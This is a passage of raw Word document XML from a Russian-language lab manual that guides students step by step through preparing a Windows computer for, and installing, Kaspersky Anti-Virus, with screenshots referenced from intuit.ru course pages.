        </w:rPr>
        <w:t xml:space="preserve">Панель управления (Пуск / Настройка / Панель управления)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2514600" cy="1874520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="Рисунок 64" descr="http://www.intuit.ru/department/security/antiviruskasp/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ntuit.ru/department/security/antiviruskasp/11/2-7.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId157" r:link="rId158">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2514600" cy="18745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3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В Панели управления найдите элемент </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установка и удаление пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и откройте его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2000" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="Рисунок 65" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-8.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId159" r:link="rId160">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="252984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3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ознакомьтесь со списком установленных на компьютере программ и убедитесь, что среди них нет других антивирусов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5204460" cy="2811780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66" name="Рисунок 66" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-9.jpg"/>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5204460" cy="281178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3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обратите внимание на системную дату, установленную на Вашем компьютере. Для этого задержите на пару секунд курсор мышки над системным временем в правом нижнем углу экрана. Системная дата должна соответств</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вать реальной дате, это будет необходимо для корректной активации продукта </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name=""/>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1943100" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="Рисунок 67" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-10.jpg"/>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0" y="0"/>
                      <a:ext cx="1943100" cy="12649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2C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На этом подготовительный этап окончен и можно переходить непосре</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ственно к установке. </w:t>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2C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc3811352"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 2. Установка</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Большинство современных приложений перед запуском необходимо установить. Стандартная процедура установки включает в себя копирование необходимых в работе программы файлов на диск (в нужное место) и регистр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цию в реестре операционной системы. Иногда для завершения установки тр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">буется перезагрузка компьютера.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Для успешной установки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требуется дистриб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тив и лицензионный ключ (файл с расширением </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.key</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, содержащий данные, уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стоверяющие легальность приобретенного продукта) либо код активации. Эти файлы обычно записываются на CD и передаются пользователю при покупке. В случае приобретения в Интернет-магазине, дистрибутив можно либо загрузить с сайта </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лаборатории Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, либо заказать отправку почтой или курь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ром на CD, лицензионный ключ высылается по e-mail. Если Вы имеете код а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тивации, то Антивирус Касперского можно активировать с помощью него, п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">сле установки. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте папку с дистрибутивом </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ее расположение можно узнать у преподавателя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43300" cy="2240280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="Рисунок 68" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-11.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165" r:link="rId166">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3543300" cy="224028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Найдите файл </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setup.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и запустите его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2750820" cy="1051560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="Рисунок 69" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-12.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167" r:link="rId168">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2750820" cy="105156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Если система удовлетворяет всем необходимым </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирусу Ка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>перского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требованиям, запустится </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер установки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В первом окне он п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">приветствует Вас и сообщит, что собирается сделать. Внимательно прочтите предложенный текст, выполните указание закрыть все сторонние открытые приложения (если таковые имеются) и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для перехода к следующему окну </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастера</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0" name="Рисунок 70" descr="http://www.intuit.ru/department/security/antiviruskasp/1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ntuit.ru/department/security/antiviruskasp/11/2-13.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169" r:link="rId170">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На втором шаге </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастера</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо ознакомиться с Лицензио</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ным соглашением между Вами и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторией Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, производителем </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В нем описаны все права и обязанности обоих ст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рон, в том числе ответственность за нарушение авторских прав и самостоятел</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ное изготовление копий антивируса. Внимательно прочтите его. Установку можно продолжить только согласившись со всеми положениями, для этого нужно отметить пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Я принимаю условия Лицензионного соглашения</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажать ставшую активной кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее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1" name="Рисунок 71" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-14.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171" r:link="rId172">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На следующем шаге нужно определить директорию, куда будут скопированы основные системные файлы антивируса. По умолчанию предлаг</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ется использовать </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\Kaspersky </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab\Kaspersky Anti-Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если она по каким-то причинам не подходит (например, у вас заканчивается место на диске С), с помощью кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обзор</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> всегда можно выбрать другую. Для пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>должения установки и перехода к следующему окну тут и в дальнейшем и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пользуйте кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее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2" name="Рисунок 72" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-15.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173" r:link="rId174">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Далее нужно выбрать тип установки: полную или выборочную. Полная означает установку всех компонентов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, а в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">борочная позволяет некоторые из них отключить. Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выборочную</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажав на квадратную кнопку слева от описания этого типа установки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3" name="Рисунок 73" descr="http://www.intuit.ru/department/security/antiviruskasp/1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ntuit.ru/department/security/antiviruskasp/11/2-16.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175" r:link="rId176">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Как и было обещано, в следующем окне можно указать, какие ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">поненты </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо установить, а какие проп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стить. На рисунке изображен вид этого окна по умолчанию, соответствующий полной установке. Будет ли установлен тот или иной компонент символизирует иконка слева от него: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74" name="Рисунок 74" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-17.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177" r:link="rId178">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rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- устанавливать, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75" name="Рисунок 75" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-18.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179" r:link="rId180">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rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- нет. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тут же можно получить краткое описание каждого компонента - для эт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">го необходимо выделить (щелкнуть правой кнопкой мыши) интересующий компонент и внизу окна появится нужная информация. На рисунке выделен </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
